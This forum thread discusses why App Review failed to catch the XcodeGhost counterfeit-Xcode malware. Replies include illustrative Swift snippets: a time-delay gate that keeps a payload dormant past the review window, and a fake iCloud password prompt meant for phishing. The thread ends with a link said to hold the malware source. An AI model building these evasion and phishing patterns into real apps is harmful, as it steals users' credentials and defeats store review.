How come the counterfeit Xcode malware wasn't caught by App Review?

After reading a good bit about the recent snafu of developers being tricked into using counterfeit Xcode versions that injected malware into people's apps, I have this question: How come App Review was unable to detect the malware?

It stands to reason that if we tried to write a virus ourselves using the legitimate Xcode, of course we'd get rejected, and probably wind up in worse trouble than that; I'm confident Apple has the ability to detect that. But regardless of who wrote the malicious code, it still ends up in an app that App Review is looking at. Shouldn't it look the same in the compiled binary either way?

Replies

Step back. Take a deep breath. And now think like a malicious developer who's clever enough to inject code into Xcode so that it bundles its own malware code/extension with every app being shipped. You'll find the answer to this question somewhere in that line of thinking 🙂

My limited understanding is that this malware did nothing to change the fact that apps are sandboxed on the device, and it didn't bypass any of the normal submission flow. All the compromised code can do is attempt phishing and inspect the clipboard while the app is running. I'm sure the malware authors would disguise such code by not activating it until the app had made it through review, so App Review wouldn't see anything out of the ordinary. If apps built by the compromised Xcode had included code that attempted to use private APIs, or anything else that didn't comply with the review guidelines and iTunes Connect's automated validation, they would not have made it into the store.
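To make that concrete, here's a minimal sketch of such a delay gate. This is purely hypothetical Swift written for illustration (the real payload was reportedly injected as a compiled library, and the key name here is made up), but it shows why dynamic analysis during the review window would see nothing unusual:

    import Foundation

    // Hypothetical sketch: record the first launch, then keep the
    // payload dormant until roughly two weeks have passed, so the
    // app behaves normally for the entire review period.
    func payloadIsArmed() -> Bool {
        let defaults = UserDefaults.standard
        let key = "firstLaunchDate"  // made-up key, for illustration only
        let firstLaunch: Date
        if let stored = defaults.object(forKey: key) as? Date {
            firstLaunch = stored
        } else {
            firstLaunch = Date()
            defaults.set(firstLaunch, forKey: key)
        }
        // Arm only after 14 days; before that, every code path is benign.
        return Date().timeIntervalSince(firstLaunch) > 14 * 24 * 60 * 60
    }

Nothing in there touches a private API, so neither a reviewer running the app nor the automated checks would have anything to flag.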

The above scenario is obviously bad. But isn't the bigger problem here developers being able to *intentionally* use their own Xcode to insert malware?

I don't think we (the public) know enough about the details involved beyond our own examples; in my case, all of my apps are still in the store. Maybe it was caught by review/API checks, and what we're hearing is a crafted response directed at users and stockholders to help ease fears. Maybe in the future we'll find out more, but right now it's all speculation, I think.

The malware was only as bad as any app that has access to information while running inside the sandbox. For example, it could request contact-book access and then copy and upload contacts and email addresses. It could potentially show a popup pretending to be from the OS, asking the user to enter their iCloud account info, and then upload it to a server (like the prompts iOS itself shows at random when it wants to update something in the background while we have some app open in the foreground). Either way, this was nothing an app can't already do; it just did it maliciously, without the developer knowing, and it probably timed things so that the misbehavior started 'after a week', thus escaping the normal review window. Since apps already request contact/address-book access and other information, the malware probably just used existing permissions (including location) to gather information for advertisers, spammers, and drug dealers alike.
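For what it's worth, that popup trick doesn't require any private API at all. Here's a rough Swift sketch (the function name, the placeholder Apple ID, and the wording are all invented for illustration) of how an ordinary UIAlertController can be dressed up to look like the system's iCloud sign-in prompt:

    import UIKit

    // Hypothetical illustration of the phishing vector described above:
    // a plain UIAlertController styled to resemble the iCloud sign-in
    // prompt that iOS itself shows from time to time.
    func presentFakeiCloudPrompt(from viewController: UIViewController) {
        let alert = UIAlertController(
            title: "Sign In to iCloud",
            message: "Enter the Apple ID password for \"user@example.com\".",
            preferredStyle: .alert)
        alert.addTextField { field in
            field.placeholder = "Password"
            field.isSecureTextEntry = true
        }
        alert.addAction(UIAlertAction(title: "Cancel", style: .cancel))
        alert.addAction(UIAlertAction(title: "OK", style: .default) { _ in
            let password = alert.textFields?.first?.text
            // A real payload would upload `password` to its server here.
            _ = password
        })
        viewController.present(alert, animated: true)
    }

Since it's just a standard alert presented with public API, there's no obvious signal for static analysis or a quick manual review to catch; the only giveaway is behavioral, and a time delay hides that too.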

The intentionally inserted malware was just a hypothetical example. What I was saying was that regardless of how it got into the apps, the malicious code is still present in the binary.

So you all are thinking it's some sort of time-delay system whereby the funny code would only activate, say, two weeks after the date of archive? That makes sense.


Anyway, I find it reassuring that even though malicious code made it into the App Store, Apple was still able to bring the situation under control quickly by identifying and removing the compromised apps. Hopefully App Review will pay closer attention to this in the future (as long as review times don't skyrocket 🙂).

The code supposedly has been posted here:


https://github.com/XcodeGhostSource/XcodeGhost